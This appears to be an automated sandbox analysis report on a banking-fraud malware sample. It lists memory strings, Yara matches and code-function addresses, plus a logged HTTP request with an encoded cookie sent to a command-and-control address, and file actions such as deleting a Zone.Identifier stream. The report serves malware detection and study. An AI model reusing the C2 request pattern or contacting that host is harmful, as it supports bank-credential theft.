                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000C.00000002.330922681.0000020EAE26A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330337408.0000020EAE268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000C.00000003.330528261.0000020EAE246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330881710.0000020EAE24D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000C.00000002.330867745.0000020EAE242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330552452.0000020EAE241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000C.00000002.330867745.0000020EAE242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330552452.0000020EAE241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000C.00000003.330435981.0000020EAE25E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.330445263.0000020EAE259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000C.00000002.330899088.0000020EAE25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000C.00000002.330881710.0000020EAE24D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000C.00000003.330423172.0000020EAE262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000003.308486479.0000020EAE232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000021.00000003.545574788.00000256D7F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545785063.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545766615.00000256D7F89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545735312.00000256D8403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545834057.00000256D8419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545608502.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545702842.00000256D8402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000C.00000002.330829301.0000020EAE213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330863414.0000020EAE23D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.330547314.0000020EAE256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.330547314.0000020EAE256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.308486479.0000020EAE232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000C.00000002.330859808.0000020EAE23B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.308486479.0000020EAE232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000C.00000003.330528261.0000020EAE246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.330467166.0000020EAE240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.330881710.0000020EAE24D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000021.00000003.549441713.00000256D7F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549424001.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.549464281.00000256D7FAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000021.00000003.545574788.00000256D7F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545785063.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545766615.00000256D7F89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545735312.00000256D8403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545834057.00000256D8419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545608502.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545702842.00000256D8402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000021.00000003.545574788.00000256D7F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545785063.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545766615.00000256D7F89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545735312.00000256D8403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545834057.00000256D8419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545608502.00000256D7FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.545702842.00000256D8402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000021.00000003.554110007.00000256D7F8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000021.00000003.554225233.00000256D8402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,6_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: qrKqRouLIbia=+JAHxLl8OYS5hw3a/60tSu2H1h9X2OJ54mhCWe5SmyAhKfL8GWOFw669cGkfnZLVb0yMbqJ6rHioy31dS+HwuzFFwYFGwAPPqH2MgAnmjEjTH2ZCD1kuOW4KwP7MER5OcCjrfeC57RTJYrFD7oNsUHCW5BSgfN3VXyx8/dMUV5Nv6TUOLacmecrm0GngY7TmKnLuL3ttJvRYLXmxjbERnwCj30SI3jxXtkUnBCWpgy7T972uAnp8KFqOqabLiorbj2SAQoJZeYAr8b8hyT5yu9yP2vZmUlwFCG/dB+hhupgwMQ6OVrIIGL4zoM7czZbAltxHHSFpv/ZcqrPmrH53Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49749 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 3.2.rundll32.exe.18475ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2560000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1e20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.164c9870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2451d890000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2451d890000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.164c9870000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2560000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.18475ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.164c9870000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.282340341.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.790902052.0000000002560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.306506166.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.306832170.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.287051568.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.287330316.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.288120370.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.284795408.0000000001E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.281943040.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.288376791.00000164C9870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.282144230.0000018475EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.791055548.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.283227101.000002451D890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6416 -s 316
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\ErRMcfUGTVTj\myfGzaHssmULBwf.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\ErRMcfUGTVTj\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720A77C2_2_00007FFC6720A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720E6C02_2_00007FFC6720E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67206F0C2_2_00007FFC67206F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720FB6C2_2_00007FFC6720FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720AF702_2_00007FFC6720AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720EB602_2_00007FFC6720EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720B5CC2_2_00007FFC6720B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720AA0C2_2_00007FFC6720AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720FCA02_2_00007FFC6720FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720895C2_2_00007FFC6720895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC672059442_2_00007FFC67205944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_005600002_2_00560000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C202_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C0582_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800091002_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800079582_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C6082_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800216182_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E282_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE82_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800118342_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800238312_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC482_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC482_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800064582_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4602_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800298882_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA02_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A82_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB02_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B42_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B42_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B82_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B82_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C42_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D42_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE42_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F02_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F82_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9042_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800215102_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9172_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C9642_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D82_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E02_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE02_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF43_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C0583_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800091003_2_0000000180009100
